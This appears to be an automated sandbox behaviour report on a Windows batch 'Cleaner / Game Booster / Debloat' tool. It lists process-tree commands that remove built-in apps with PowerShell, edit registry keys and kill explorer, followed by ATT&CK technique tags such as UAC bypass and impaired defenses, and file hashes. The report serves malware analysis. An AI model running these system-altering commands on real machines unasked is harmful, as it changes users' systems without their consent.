C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 1 " nul2⤵PID:1676
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4732
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:4792
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:5020
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:2820
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:2036
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:1492
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4236
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:4072
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:2652
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:5056
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:1276
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:3212
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " Version 2.0 " nul2⤵PID:5116
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul2⤵PID:4228
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:1052
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 1 " nul2⤵PID:1688
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:3360
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:1460
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:8
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:4256
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:1216
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:4420
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:3236
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:5064
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:1736
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:2788
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:4124
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:2272
-
-
C:\Windows\System32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f2⤵PID:3956
-
-
C:\Windows\System32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t REG_DWORD /d "0" /f2⤵PID:2676
-
-
C:\Windows\System32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f2⤵PID:1964
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " Version 2.0 " nul2⤵PID:2844
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul2⤵PID:3632
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:1996
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 1 " nul2⤵PID:3468
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4056
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:1564
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:400
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:1572
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:1324
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:3880
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:2776
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:2852
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:2848
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:1676
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:2112
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *WindowsAlarms* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *WindowsCamera* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *MicrosoftOfficeHub* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *OneNote* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *people* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *WindowsPhone* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *solit* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *WindowsSoundRecorder* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Sway* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *CommsPhone* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *ConnectivityStore* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Facebook* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Twitter* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Get-AppxPackage *Drawboard PDF* | Remove-AppxPackage"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2588
-
-
C:\Windows\System32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f2⤵PID:1052
-
-
C:\Windows\System32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f2⤵
- Modifies visiblity of hidden/system files in Explorer
PID:4468
-
-
C:\Windows\System32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f2⤵
- Modifies visibility of file extensions in Explorer
PID:2644
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
PID:1980
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3228
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " Version 2.0 " nul2⤵PID:3592
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul2⤵PID:1736
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:3796
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 1 " nul2⤵PID:1452
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:2844
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:4612
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4512
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:4312
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4868
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:936
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:3268
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:3476
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:2576
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:400
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:1720
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:1604
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3488
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1464
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1248
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4796
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:4416
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3660
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4700
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:2772
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4392
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2468
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4436
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3368
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2648
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:508
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2880
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3792
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
PID:4132
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4332
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4672
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4512
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3148
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1948
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:3608
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3792
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:976
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:536
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:2680
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3132
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1604
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4184
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:984
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2988
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3820
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3700
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4280
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3436
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4468
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2712
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4192
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1736
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5104
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3944
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1784
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:4080
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:548
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4976
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:2072
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:424
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Active Setup
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Active Setup
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
3Hidden Files and Directories
3Impair Defenses
1Disable or Modify Tools
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556c43715e0e7fa58012d8a5769d8d568
SHA14370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA2568ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize
1KB
MD5cf70f70f9c094c99b5d7b8a1fabd9513
SHA16ea5b0d7a9c431d27b6c8c313ddf1289313f64cd
SHA2560476b6e80795f5d3cb917f6315469a157fca6318eaa7618453bce0f670157fde
SHA512dadbf08b99245a9aa10f2bf98beb95248823dc8838cf76eb0628a011437ba5625f766c86cd0cbcb2f22ddc7cced3cae933e7202cb359a2b140790d4a0b6a8f6c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\M6JCG2RK\microsoft.windows[1].xml
Filesize96B
MD5732a32ad072ef786d816a4f85b1b6bea
SHA1fe1945717c160ac3266f291564a003c044d409b0
SHA2567dd2262373fcd6ebe2ed2c6e66242c85b1434c3fe23ca92ba41ae328ce8b941e
SHA51255b57d5bf942f20a3557f20adeebb4c01cde4aec9d7a4fa8bfe6281fe0981773d8ce637fdbd1dc64f25abe72d75fad2a6538fadc86483ede9fdc5b59c0d36b79
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133740748476027766.txt
Filesize75KB
MD5703801b739b4e74d5e5ecd811d0a9dd7
SHA135b8d5817b208942a0fe30603cadf0f35ce3f0e8
SHA256b7876635cc3e3898e9594a5d6be9fd1125c212ac4392ee9b7789473e48be33bd
SHA512a7619e7a827103488b6f3fa80b2162d1fb93ad5d9c13db8d18857c149ed34dbc3c7e69497c9514fe6b4c2b3a702ff1b1ed09978ddadb500b6131d8d61c4835f8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
55KB
MD576f94fe08cc7b659f2d6b8e475a74baa
SHA16bee16deff8a87e3f02d4b11380da60bf976a240
SHA256fd5967c4267c8fde06482595aff50653e801cd0cb0110a5799fa0d2c7bb0f0b1
SHA5121ce7656aa64d2e1809a8fb1ea2b9ffb03213b63b99330ec5a1ccd792ceae85f7d52a42e4ca1aadad45ba4a01e10a12a03b162936838fc2a57bc079211e92bb54
-
Filesize
634B
MD5cf04779e43afe21e2420e4fc4641c551
SHA159143b29ad70180bbd90daaf12f9309eb4625fc4
SHA256f03f052041664c4359f61f7acc64705d15d821f445af92cd74d8ddf8056f1701
